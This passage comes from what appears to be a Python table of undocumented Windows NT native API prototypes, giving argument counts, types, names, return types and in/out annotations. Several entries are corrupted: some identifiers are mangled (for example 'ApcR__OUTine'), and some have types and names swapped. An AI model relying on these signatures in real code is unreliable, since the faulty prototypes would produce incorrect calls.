'PTOKEN_PRIVILEGES', 'PTOKEN_GROUPS', 'ULONG', 'PUNICODE_STRING', 'ULONG', 'PUNICODE_STRING', 'PTOKEN_GROUPS', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_SECURITY_ATTRIBUTES__INFORMATION', 'PTOKEN_GROUPS', 'PHANDLE'], ['TokenHandle', 'Flags', 'SidsToDisable', 'PrivilegesToDelete', 'RestrictedSids', 'DisableUserClaimsCount', 'UserClaimsToDisable', 'DisableDeviceClaimsCount', 'DeviceClaimsToDisable', 'DeviceGroupsToDisable', 'RestrictedUserAttributes', 'RestrictedDeviceAttributes', 'RestrictedDeviceGroups', 'NewTokenHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN', '__IN_opt', '__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT']), 'NtGetCachedSigningLevel': (6, ['HANDLE', 'PULONG', 'PBYTE', 'PUCHAR', 'PULONG', '__opt'], ['File', 'Flags', 'SigningLevel', 'Thumbprint', 'ThumbprintSize', 'PULONG'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__OUT', '__IN_OUT_opt', None]), 'NtGetCompleteWnfStateSubscription': (6, ['PWNF_STATE_NAME', 'PULONG', 'ULONG', 'ULONG', 'PVOID', 'ULONG'], ['OldDescriptorStateName', 'OldSubscriptionId', 'OldDescriptorEventMask', 'OldDescriptorStatus', 'NewDeliveryDescriptor', 'DescriptorSize'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN']), 'NtGetContextThread': (2, ['HANDLE', 'PCONTEXT'], ['ThreadHandle', 'pContext'], 'NTSTATUS', ['__IN', '__OUT']), 'NtGetCurrentProcessorNumber': (0, [], [], 'ULONG', []), 'NtGetCurrentProcessorNumberEx': (1, ['__opt'], ['PULONG'], 'NTSTATUS', [None]), 'NtGetDevicePowerState': (2, ['HANDLE', 'PDEVICE_POWER_STATE'], ['DeviceHandle', 'State'], 'NTSTATUS', ['__IN', '__OUT']), 'NtImpersonateAnonymousToken': (1, ['HANDLE'], ['THreadHandle'], 'NTSTATUS', ['__IN']), 'NtInitializeRegistry': (1, ['ULONG'], ['Options'], 'NTSTATUS', ['__IN']), 'NtInitiatePowerAction': (4, ['POWER_ACTION', 'SYSTEM_POWER_STATE', 'ULONG', 'BOOLEAN'], ['Action', 'State', 'Flags', 'Asynch'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtIsSystemResumeAutomatic': (0, [], [], 'NTSTATUS', []), 'NtLoadKeyEx': (8, ['POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES', 'ULONG', 'HANDLE', 'PVOID', 'PVOID', 'PVOID', 'PIO_STATUS_BLOCK'], ['TargetKey', 'SourceFile', 'Flags', 'TrustClassKey', 'Reserved', 'ObjectContext', 'CallbackReserved', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_opt', '__IN', '__IN', '__IN', '__OUT']), 'NtLockProductActivationKeys': (2, ['PULONG', 'PULONG'], ['ProductBuild', 'SafeMode'], 'NTSTATUS', ['__IN', '__IN']), 'NtLockRegistryKey': (1, ['HANDLE'], ['KeyHandle'], 'NTSTATUS', ['__IN']), 'NtMakePermanentObject': (1, ['HANDLE'], ['Object'], 'NTSTATUS', ['__IN']), 'NtManageHotPatch': (4, ['ULONG', 'PULONGLONG', 'ULONG', 'PVOID'], ['Unknown', 'Unknown', 'Unknown', 'Unknown'], 'NTSTATUS', [None, None, None, None]), 'NtMapCMFModule': (6, ['ULONG', 'ULONG', '__opt', '__opt', '__opt', '__opt'], ['What', 'Index', 'PULONG', 'PULONG', 'PULONG', 'PPVOID'], 'NTSTATUS', ['__IN', '__IN', None, None, None, None]), 'NtModifyBootEntry': (1, ['PBOOT_ENTRY'], ['BootEntry'], 'NTSTATUS', ['__IN']), 'NtModifyDriverEntry': (1, ['PDRIVER_ENTRY'], ['DriverEntry'], 'NTSTATUS', ['__IN']), 'NtNotifyChangeDirectoryFileEx': (10, ['HANDLE', 'HANDLE', 'PIO_APC_R__OUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'ULONG', 'BOOLEAN', 'DIRECTORY_NOTIFY__INFORMATION_CLASS'], ['FileHandle', 'Event', 'ApcR__OUTine', 'ApcContext', 'IoStatusBlock', 'Buffer', 'Length', 'CompletionFilter', 'WatchTree', 'DirectoryNotifyInformationClass'], 'NTSTATUS', ['__IN_', '__IN_opt_', '__IN_opt_', '__IN_opt_', None, None, '__IN_', '__IN_', '__IN_', '__IN_opt_']), 'NtNotifyChangeMultipleKeys': (12, ['HANDLE', 'ULONG', 'POBJECT_ATTRIBUTES', 'HANDLE', 'PIO_APC_R__OUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG', 'BOOLEAN', '__opt', 'ULONG', 'BOOLEAN'], ['MasterKeyHandle', 'Count', 'SubordinateObjects', 'Event', 'ApcR__OUTine', 'ApcContext', 'IoStatusBlock', 'CompletionFilter', 'WatchTree', 'PVOID', 'BufferSize', 'Asynchronous'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__IN_opt', '__OUT', '__IN', '__IN', None, '__IN', '__IN']), 'NtOpenKeyEx': (4, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES', 'ULONG'], ['KeyHandle', 'DesiredAccess', 'ObjectAttributes', 'OpenOptions'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN']), 'NtOpenKeyedEvent': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['KeyedEventHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtOpenRegistryTransaction': (3, ['PHANDLE', 'ACCESS_MASK', 'POBJECT_ATTRIBUTES'], ['RegistryHandle', 'DesiredAccess', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN', '__IN']), 'NtPlugPlayControl': (3, ['ULONG', 'PVOID', 'ULONG'], ['Class', 'Buffer', 'BufferSize'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN']), 'NtPssCaptureVaSpaceBulk': (5, ['HANDLE', 'PVOID', 'PVOID', 'SIZE_T', 'PSIZE_T'], ['ProcessHandle', 'BaseAddress', 'Buffer', 'Length', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT']), 'NtQueryAuxiliaryCounterFrequency': (1, ['PULONGLONG'], ['lpAuxiliaryCounterFrequency'], 'NTSTATUS', ['__OUT']), 'NtQueryDebugFilterState': (2, ['ULONG', 'ULONG'], ['Component', 'Level'], 'NTSTATUS', ['__IN', '__IN']), 'NtQueryInformationByName': (5, ['POBJECT_ATTRIBUTES', 'PIO_STATUS_BLOCK', 'PVOID', 'ULONG', 'FILE__INFORMATION_CLASS'], ['ObjectAttributes', 'IoStatusBlock', 'FileInformation', 'Length', 'FileInformationClass'], 'NTSTATUS', ['__IN', '__OUT', '__OUT', '__IN', '__IN']), 'NtQueryInstallUILanguage': (1, ['PULONG'], ['LanguageId'], 'NTSTATUS', ['__OUT']), 'NtQueryLicenseValue': (5, ['PUNICODE_STRING', 'PULONG', 'PVOID', 'ULONG', 'PULONG'], ['Name', 'Type', 'Buffer', 'Length', 'ReturnedLength'], 'NTSTATUS', ['__IN', '__OUT_opt', '__OUT', '__IN', '__OUT']), 'NtQueryOpenSubKeys': (2, ['POBJECT_ATTRIBUTES', 'PULONG'], ['TargetKey', 'HandleCount'], 'NTSTATUS', ['__IN', '__OUT']), 'NtQueryOpenSubKeysEx': (4, ['POBJECT_ATTRIBUTES', 'ULONG', 'PVOID', 'PULONG'], ['TargetKey', 'BufferLength', 'Buffer', 'ResultLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__OUT']), 'NtQueryPortInformationProcess': (0, [], [], 'NTSTATUS', []), 'NtQuerySecurityPolicy': (6, ['PUNICODE_STRING', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PULONG', 'PBOOLEAN', 'PULONG'], ['Category', 'SubCategory', 'Policy', 'Unknown', 'Enabled', 'Subsystem'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN_OUT', '__OUT', '__IN']), 'NtQueryWnfStateNameInformation': (5, ['PCWNF_STATE_NAME', 'ULONG', 'PVOID', 'PVOID', 'ULONG'], ['StateName', 'NameInfoClass', 'ExplicitScope', 'InfoBuffer', 'InfoBufferSize'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__OUT', '__IN']), 'NtRenameKey': (2, ['HANDLE', 'PUNICODE_STRING'], ['KeyHandle', 'ReplacementName'], 'NTSTATUS', ['__IN', '__IN']), 'NtResumeProcess': (1, ['HANDLE'], ['hProcess'], 'NTSTATUS', ['__IN']), 'NtRevertContainerImpersonation': (0, [], [], 'NTSTATUS', []), 'NtRollbackRegistryTransaction': (2, ['HANDLE', 'BOOL'], ['RegistryHandle', 'Wait'], 'NTSTATUS', [None, None]), 'NtSaveKeyEx': (3, ['HANDLE', 'HANDLE', 'ULONG'], ['KeyHandle', 'FileHandle', 'Flags'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSaveMergedKeys': (3, ['HANDLE', 'HANDLE', 'HANDLE'], ['HighPrecedenceKeyHandle', 'LowPrecedenceKeyHandle', 'FileHandle'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSecureConnectPort': (9, ['PHANDLE', 'PUNICODE_STRING', 'ULONG', 'PPORT_VIEW', 'PSID', 'PREMOTE_PORT_VIEW', 'PULONG', 'PVOID', 'PULONG'], ['PortHandle', 'Name', 'QOS', 'pSectionInfo', 'SecurityInfo', 'pSectionMapInfo', 'MaxMsgLength', 'ConnectData', 'ConnectDataLength'], 'NTSTATUS', ['__OUT', '__IN', '__IN', '__IN_OUT', '__IN', '__IN_OUT', '__OUT', '__IN_OUT_opt', '__IN_OUT_opt']), 'NtSetBootOptions': (2, ['PVOID', 'ULONG'], ['Buffer', 'BufferLength'], 'NTSTATUS', ['__IN', '__IN']), 'NtSetCachedSigningLevel': (5, ['ULONG', 'BYTE', 'PHANDLE', 'ULONG', 'HANDLE'], ['Flags', 'InputSigningLevel', 'SourceFiles', 'SourceFileCount', 'TargetFile'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN_opt']), 'NtSetCachedSigningLevel2': (6, ['ULONG', 'BYTE', 'PHANDLE', 'ULONG', 'HANDLE', 'PVOID'], ['Flags', 'InputSigningLevel', 'SourceFiles', 'SourceFileCount', 'TargetFile', 'LevelInformation'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN_opt', '__IN_opt']), 'NtSetContextThread': (2, ['HANDLE', 'PCONTEXT'], ['ThreadHandle', 'pContext'], 'NTSTATUS', ['__IN', '__IN']), 'NtSetDebugFilterState': (3, ['ULONG', 'ULONG', 'BOOLEAN'], ['Component', 'Level', 'State'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSetDefaultUILanguage': (1, ['ULONG'], ['LanguageId'], 'NTSTATUS', ['__IN']), 'NtSetIRTimer': (2, ['HANDLE', 'PLARGE_INTEGER'], ['TimerHandle', 'Time'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtSetInformationDebugObject': (5, ['HANDLE', 'DEBUGOBJECTINFOCLASS', 'PVOID', 'ULONG', 'PULONG'], ['DebugHandle', 'Class', 'Buffer', 'Length', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__OUT_opt']), 'NtSetInformationSymbolicLink': (4, ['HANDLE', 'ULONG', 'PVOID', 'ULONG'], ['Handle', 'Class', 'Buffer', 'BufferLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN']), 'NtSetLdtEntries': (6, ['ULONG', 'ULONG', 'ULONG', 'ULONG', 'ULONG', 'ULONG'], ['Selector1', 'LdtEntry1L', 'LdtEntry1H', 'Selector2', 'LdtEntry2L', 'LdtEntry2H'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtSetSystemEnvironmentValueEx': (5, ['PUNICODE_STRING', 'PVOID', 'PVOID', 'ULONG', 'ULONG'], ['Name', 'Guid', 'Buffer', 'BufferLength', 'Attributes'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN']), 'NtSetSystemPowerState': (3, ['POWER_ACTION', 'SYSTEM_POWER_STATE', 'ULONG'], ['Action', 'State', 'Flags'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtSetThreadExecutionState': (2, ['ULONG', 'PULONG'], ['State', 'PreviousState'], 'NTSTATUS', ['__IN', '__OUT']), 'NtSetUuidSeed': (1, ['PUCHAR'], ['UuidSeed'], 'NTSTATUS', ['__IN']), 'NtSubscribeWnfStateChange': (4, ['PCWNF_STATE_NAME', 'ULONG', 'ULONG', '__opt'], ['StateName', 'ChangeStamp', 'EventMask', 'PULONG'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN', None]), 'NtSuspendProcess': (1, ['HANDLE'], ['ProcessHandle'], 'NTSTATUS', ['__IN']), 'NtTranslateFilePath': (4, ['PVOID', 'ULONG', 'PVOID', 'ULONG'], ['InputPath', '__OUTputType', '__OUTputFilePath', '__OUTputFilePathLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN']), 'NtUnloadKey2': (2, ['POBJECT_ATTRIBUTES', 'ULONG'], ['TargetKey', 'Flags'], 'NTSTATUS', ['__IN', '__IN']), 'NtUnloadKeyEx': (2, ['POBJECT_ATTRIBUTES', 'HANDLE'], ['TargetKey', 'Event'], 'NTSTATUS', ['__IN', '__IN']), 'NtUnsubscribeWnfStateChange': (1, ['PCWNF_STATE_NAME'], ['StateName'], 'NTSTATUS', ['__IN']), 'NtVdmControl': (2, ['ULONG', 'PVOID'], ['ControlCode', 'ControlData'], 'NTSTATUS', ['__IN', '__IN']), 'NtWaitForAlertByThreadId': (2, ['HANDLE', 'PLARGE_INTEGER'], ['Handle', 'Time_Out'], 'NTSTATUS', ['__IN', '__IN_opt']), 'NtWaitForDebugEvent': (4, ['HANDLE', 'BOOLEAN', 'PLARGE_INTEGER', 'PULONG'], ['DebugHandle', 'Alertable', 'Time_Out', 'Result'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__OUT']), 'NtLoadKey3': (8, ['POBJECT_ATTRIBUTES', 'POBJECT_ATTRIBUTES', 'ULONG', 'PVOID', 'ULONG', 'ACCESS_MASK', 'HANDLE', 'ULONG'], ['KeyObjectAttributes', 'FileObjectAttributes', 'Flags', 'LoadArguments', 'LoadArgumentCount', 'DesiredAccess', 'KeyHandle', 'Unkown'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN', '__IN']), 'NtAlpcConnectPort': (11, ['PHANDLE', 'PUNICODE_STRING', 'POBJECT_ATTRIBUTES', 'PALPC_PORT_ATTRIBUTES', 'ULONG', 'PSID', 'PPORT_MESSAGE', 'PULONG', 'PALPC_MESSAGE_ATTRIBUTES', 'PALPC_MESSAGE_ATTRIBUTES', 'PLARGE_INTEGER'], ['PortHandle', 'PortName', 'ObjectAttributes', 'PortAttributes', 'Flags', 'RequiredServerSid', 'ConnectionMessage', 'BufferLength', '__OUTMessageAttributes', '__INMessageAttributes', 'Time_Out'], 'NTSTATUS', [None, '__IN_', '__IN_opt_', '__IN_opt_', '__IN_', '__IN_opt_', None, '__IN_OUT_opt_', '__IN_OUT_opt_', '__IN_OUT_opt_', '__IN_opt_']), 'NtCancelDeviceWakeupRequest': (1, ['HANDLE'], ['Device'], 'NTSTATUS', ['__IN_']), 'NtCreateChannel': (2, ['PHANDLE', 'POBJECT_ATTRIBUTES'], ['ChannelHandle', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN_opt']), 'NtFreeUserPhysicalPages': (3, ['HANDLE', 'PULONG', 'PULONG'], ['ProcessHandle', 'NumberOfPages', 'UserPfnArray'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN_OUT']), 'NtGetPlugPlayEvent': (4, ['PPLUGPLAY_APC_R__OUTINE', 'PVOID', 'PPLUGPLAY_EVENT_BLOCK', 'ULONG'], ['PnPApcR__OUTine', 'PnPContext', 'PnPEvent', 'EventBufferLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN']), 'NtOpenChannel': (2, ['PHANDLE', 'POBJECT_ATTRIBUTES'], ['ChannelHandle', 'ObjectAttributes'], 'NTSTATUS', ['__OUT', '__IN']), 'NtReplyWaitSendChannel': (3, ['PVOID', 'ULONG', 'PCHANNEL_MESSAGE'], ['Text', 'Length', '*Message'], 'NTSTATUS', ['__IN', '__IN', '__OUT']), 'NtSendWaitReplyChannel': (4, ['HANDLE', 'PVOID', 'ULONG', 'PCHANNEL_MESSAGE'], ['ChannelHandle', 'Text', 'Length', '*Message'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT']), 'NtSetContextChannel': (1, ['PVOID'], ['Context'], 'NTSTATUS', ['__IN']), 'NtRequestDeviceWakeup': (1, ['HANDLE'], ['Device'], 'NTSTATUS', ['__IN']), 'NtRequestWakeupLatency': (1, ['LATENCY_TIME'], ['latency'], 'NTSTATUS', ['__IN']), 'NtW32Call': (5, ['ULONG', 'PVOID', 'ULONG', 'PVOID', 'PULONG'], ['ApiNumber', 'InputBuffer', 'InputLength', '*__OUTputBuffer', '__OUTputLength'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__OUT']), 'KiUserApcDispatcher': (5, ['PVOID', 'PVOID', 'PVOID', 'PVOID', 'PVOID'], ['Unused1', 'Unused2', 'Unused3', 'ContextStart', 'ContextBody'], 'VOID', ['__IN', '__IN', '__IN', '__IN', '__IN']), 'NtAlertThread': (1, ['HANDLE'], ['ThreadHandle'], 'NTSTATUS', ['__IN']), 'NtCallbackReturn': (3, ['PVOID', 'ULONG', 'NTSTATUS'], ['Result', 'ResultLength', 'Status'], 'NTSTATUS', ['__IN_opt', '__IN', '__IN']), 'NtQueueApcThread': (5, ['HANDLE', 'PIO_APC_ROUTINE', 'PVOID', 'PIO_STATUS_BLOCK', 'ULONG'], ['ThreadHandle', 'ApcRoutine', 'ApcRoutineContext', 'ApcStatusBlock', 'ApcReserved'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN_opt', '__IN_opt']), 'NtTestAlert': (0, [], [], 'NTSTATUS', []), 'NtAddAtom': (2, ['PWCHAR', 'PRTL_ATOM'], ['AtomName', 'Atom'], 'NTSTATUS', ['__IN', '__OUT']), 'NtDeleteAtom': (1, ['RTL_ATOM'], ['Atom'], 'NTSTATUS', ['__IN']), 'NtFindAtom': (2, ['PWCHAR', 'PRTL_ATOM'], ['AtomName', 'Atom'], 'NTSTATUS', ['__IN', '__OUT_opt']), 'NtQueryInformationAtom': (5, ['RTL_ATOM', 'ATOM_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['Atom', 'AtomInformationClass', 'AtomInformation', 'AtomInformationLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN', '__OUT', '__IN', '__OUT_opt']), 'RtlCompressBuffer': (8, ['ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG', 'ULONG', 'PULONG', 'PVOID'], ['CompressionFormat', 'SourceBuffer', 'SourceBufferLength', 'DestinationBuffer', 'DestinationBufferLength', 'Unknown', 'pDestinationSize', 'WorkspaceBuffer'], 'NTSTATUS', ['__IN', '__IN', '__IN', '__OUT', '__IN', '__IN', '__OUT', '__IN']), 'RtlDecompressBuffer': (6, ['ULONG', 'PVOID', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['CompressionFormat', 'DestinationBuffer', 'DestinationBufferLength', 'SourceBuffer', 'SourceBufferLength', 'pDestinationSize'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__IN', '__IN', '__OUT']), 'RtlGetCompressionWorkSpaceSize': (3, ['ULONG', 'PULONG', 'PULONG'], ['CompressionFormat', 'pNeededBufferSize', 'pUnknown'], 'NTSTATUS', ['__IN', '__OUT', '__OUT']), 'DbgPrint': (1, ['LPCSTR'], ['Format'], 'NTSTATUS', ['__IN']), 'NtSystemDebugControl': (6, ['SYSDBG_COMMAND', 'PVOID', 'ULONG', 'PVOID', 'ULONG', 'PULONG'], ['Command', 'InputBuffer', 'InputBufferLength', 'OutputBuffer', 'OutputBufferLength', 'ReturnLength'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN', '__OUT_opt', '__IN', '__OUT_opt']), 'RtlCaptureStackBackTrace': (4, ['ULONG', 'ULONG', 'PVOID', 'PULONG'], ['FramesToSkip', 'FramesToCapture', '*BackTrace', 'BackTraceHash'], 'USHORT', ['__IN', '__IN', '__OUT', '__OUT']), 'RtlGetCallersAddress': (2, ['PVOID', 'PVOID'], ['*CallersAddress', '*CallersCaller'], 'PVOID', ['__OUT', '__OUT']), 'NtDisplayString': (1, ['PUNICODE_STRING'], ['String'], 'NTSTATUS', ['__IN']), 'NtRaiseException': (3, ['PEXCEPTION_RECORD', 'PCONTEXT', 'BOOLEAN'], ['ExceptionRecord', 'ThreadContext', 'HandleException'], 'NTSTATUS', ['__IN', '__IN', '__IN']), 'NtRaiseHardError': (6, ['NTSTATUS', 'ULONG', 'PUNICODE_STRING', 'PVOID', 'HARDERROR_RESPONSE_OPTION', 'PHARDERROR_RESPONSE'], ['ErrorStatus', 'NumberOfParameters', 'UnicodeStringParameterMask', '*Parameters', 'ResponseOption', 'Response'], 'NTSTATUS', ['__IN', '__IN', '__IN_opt', '__IN', '__IN', '__OUT']), 'NtSetDefaultHardErrorPort': (1, ['HANDLE'], ['PortHandle'], 'NTSTATUS', ['__IN']), 'NtQuerySystemEnvironmentValue': (4, ['PUNICODE_STRING', 'PWCHAR', 'ULONG', 'PULONG'], ['VariableName', 'Value', 'ValueBufferLength', 'RequiredLength'], 'NTSTATUS', ['__IN', '__OUT', '__IN', '__OUT_opt']), 'NtSetSystemEnvironmentValue': (2, ['PUNICODE_STRING', 'PUNICODE_STRING'], ['VariableName', 'Value'], 'NTSTATUS', ['__IN', '__IN']), 'RtlCreateEnvironment': (2, ['BOOLEAN', 'PVOID'], ['Inherit', '*Environment'], 'NTSTATUS', ['__IN', '__OUT']), 'RtlDestroyEnvironment': (1, ['PVOID'], ['Environment'], 'VOID', ['__IN']), 'RtlExpandEnvironmentStrings_U': (4, ['PVOID', 'PUNICODE_STRING', 'PUNICODE_STRING', 'PULONG'], ['Environment', 'SourceString', 'DestinationString', 'DestinationBufferLength'], 'NTSTATUS', ['__IN_opt', '__IN', '__OUT', '__OUT_opt']), 'RtlQueryEnvironmentVariable_U': (3, ['PVOID', 'PUNICODE_STRING', 'PUNICODE_STRING'], ['Environment', 'VariableName', 'VariableValue'], 'NTSTATUS', ['__IN_opt', '__IN', '__OUT']), 'RtlSetCurrentEnvironment': (2, ['PVOID', 'PVOID'], ['NewEnvironment', '*OldEnvironment'], 'VOID', ['__IN', '__OUT_opt']), 'RtlSetEnvironmentVariable': (3, ['PVOID', 'PUNICODE_STRING', 'PUNICODE_STRING'], ['*Environment', 'VariableName', 'VariableValue'], 'NTSTATUS', ['__IN_OUT_opt', '__IN', '__IN']), 'LdrGetDllHandle': (4, ['PWORD', 'PVOID', 'PUNICODE_STRING', 'PHANDLE'], ['pwPath', 'Unused', 'ModuleFileName', 'pHModule'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN', '__OUT']), 'LdrGetProcedureAddress': (4, ['HMODULE', 'PANSI_STRING', 'WORD', 'PVOID'], ['ModuleHandle', 'FunctionName', 'Oridinal', '*FunctionAddress'], 'NTSTATUS', ['__IN', '__IN_opt', '__IN_opt', '__OUT']), 'LdrLoadDll': (4, ['PWCHAR', 'ULONG', 'PUNICODE_STRING', 'PHANDLE'], ['PathToFile', 'Flags', 'ModuleFileName', 'ModuleHandle'], 'NTSTATUS', ['__IN_opt', '__IN_opt', '__IN', '__OUT']), 'LdrQueryProcessModuleInformation': (3, ['PSYSTEM_MODULE_INFORMATION', 'ULONG', 'PULONG'], ['SystemModuleInformationBuffer', 'BufferSize', 'RequiredSize'], 'NTSTATUS', ['__OUT', '__IN', '__OUT_opt']), 'LdrShutdownProcess': (0, [], [], 'VOID', []), 'LdrShutdownThread': (0, [], [], 'VOID', []), 'LdrUnloadDll': (1, ['HANDLE'], ['ModuleHandle'], 'NTSTATUS', ['__IN']), 'NtLoadDriver': (1, ['PUNICODE_STRING'], ['DriverServiceName'], 'NTSTATUS', ['__IN']), 'NtUnloadDriver': (1, ['PUNICODE_STRING'], ['DriverServiceName'], 'NTSTATUS', ['__IN']), 'RtlImageNtHeader': (1, ['PVOID'], ['ModuleAddress'], 'PIMAGE_NT_HEADERS', ['__IN']), 'RtlImageRvaToVa': (4, ['PIMAGE_NT_HEADERS', 'PVOID', 'ULONG', 'PIMAGE_SECTION_HEADER'], ['NtHeaders', 'ModuleBase', 'Rva', 'pLastSection'], 'PVOID', ['__IN', '__IN', '__IN', '__IN_OUT_opt']), 'NtFlushWriteBuffer': (0, [], [], 'NTSTATUS', []), 'NtShutdownSystem': (1, ['SHUTDOWN_ACTION'], ['Action'], 'NTSTATUS', ['__IN']), 'NtQueryDefaultLocale': (2, ['BOOLEAN', 'PLCID'], ['UserProfile', 'DefaultLocaleId'], 'NTSTATUS', ['__IN', '__OUT']), 'NtSetDefaultLocale': (2, ['BOOLEAN', 'LCID'], ['UserProfile', 'DefaultLocaleId'], 'NTSTATUS', ['__IN', '__IN']), 'RtlAllocateHeap': (3, ['PVOID', 'ULONG', 'ULONG'], ['HeapHandle', 'Flags', 'Size'], 'PVOID', ['__IN', '__IN', '__IN']), 'RtlCompactHeap': (2, ['HANDLE', 'ULONG'], ['HeapHandle', 'Flags'], 'ULONG', ['__IN', '__IN']), 'RtlCreateHeap': (6, ['ULONG', 'PVOID', 'ULONG', 'ULONG', 'BOOLEAN', 'PRTL_HEAP_DEFINITION'], ['Flags', 'Base', 'Reserve', 'Commit', 'Lock', 'RtlHeapParams'], 'PVOID', ['__IN', '__IN_opt', '__IN_opt', '__IN', '__IN_opt', '__IN_opt']), 'RtlDestroyHeap': (1, ['PVOID'], ['HeapHandle'], 'NTSTATUS', ['__IN']), 'RtlEnumProcessHeaps': (2, ['PHEAP_ENUMERATION_ROUTINE', 'PVOID'], ['HeapEnumerationRoutine', 'Param'], 'NTSTATUS', ['__IN', '__IN_opt']), 'RtlFreeHeap': (3, ['PVOID', 'ULONG', 'PVOID'], ['HeapHandle', 'Flags', 'MemoryPointer'], 'BOOLEAN', ['__IN', '__IN_opt', '__IN']), 'RtlGetProcessHeaps': (2, ['ULONG', 'PVOID'], ['MaxNumberOfHeaps', '*HeapArray'], 'ULONG', ['__IN', '__OUT']), 'RtlLockHeap': (1, ['PVOID'], ['HeapHandle'], 'BOOLEAN', ['__IN']), 'RtlProtectHeap': (2, ['PVOID', 'BOOLEAN'], ['HeapHandle', 'Protect'], 'PVOID', ['__IN', '__IN']), 'RtlReAllocateHeap': (4, ['PVOID', 'ULONG', 'PVOID', 'ULONG'], ['HeapHandle', 'Flags', 'MemoryPointer', 'Size'], 'PVOID', ['__IN', '__IN', '__IN', '__IN']), 'RtlSizeHeap': (3, ['PVOID', 'ULONG', 'PVOID'], ['HeapHandle', 'Flags', 'MemoryPointer'], 'ULONG', ['__IN', '__IN', '__IN']), 'RtlUnlockHeap': (1, ['PVOID'], ['HeapHandle'], 'BOOLEAN', ['__IN']), 'RtlValidateHeap': (3, ['PVOID', 'ULONG', 'PVOID'], ['HeapHandle', 'Flags', 'AddressToValidate'], 'BOOLEAN', ['__IN', '__IN', '__IN_opt']), 'RtlValidateProcessHeaps': (0, [], [], 'BOOLEAN', []), 'RtlWalkHeap': (2, ['PVOID', 'LPPROCESS_HEAP_ENTRY'], ['HeapHandle', 'ProcessHeapEntry'], 'NTSTATUS', ['__IN', '__IN_OUT']), 'NtAllocateVirtualMemory': (6, ['HANDLE', 'PVOID', 'ULONG', 'PULONG', 'ULONG', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'ZeroBits', 'RegionSize', 'AllocationType', 'Protect'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN', '__IN_OUT', '__IN', '__IN']), 'NtFlushVirtualMemory': (4, ['HANDLE', 'PVOID', 'PULONG', 'PIO_STATUS_BLOCK'], ['ProcessHandle', '*BaseAddress', 'NumberOfBytesToFlush', 'IoStatusBlock'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN_OUT', '__OUT']), 'NtFreeVirtualMemory': (4, ['HANDLE', 'PVOID', 'PULONG', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'RegionSize', 'FreeType'], 'NTSTATUS', ['__IN', '__IN', '__IN_OUT', '__IN']), 'NtLockVirtualMemory': (4, ['HANDLE', 'PVOID', 'PULONG', 'ULONG'], ['ProcessHandle', '*BaseAddress', 'NumberOfBytesToLock', 'LockOption'], 'NTSTATUS', ['__IN', '__IN', '__IN_OUT', '__IN']), 'NtProtectVirtualMemory': (5, ['HANDLE', 'PVOID', 'PULONG', 'ULONG', 'PULONG'], ['ProcessHandle', '*BaseAddress', 'NumberOfBytesToProtect', 'NewAccessProtection', 'OldAccessProtection'], 'NTSTATUS', ['__IN', '__IN_OUT', '__IN_OUT', '__IN', '__OUT']), 'NtQueryVirtualMemory': (6, ['HANDLE', 'PVOID', 'MEMORY_INFORMATION_CLASS', 'PVOID', 'ULONG', 'PULONG'], ['ProcessHandle', 'BaseAddress', 'MemoryInformationClass', 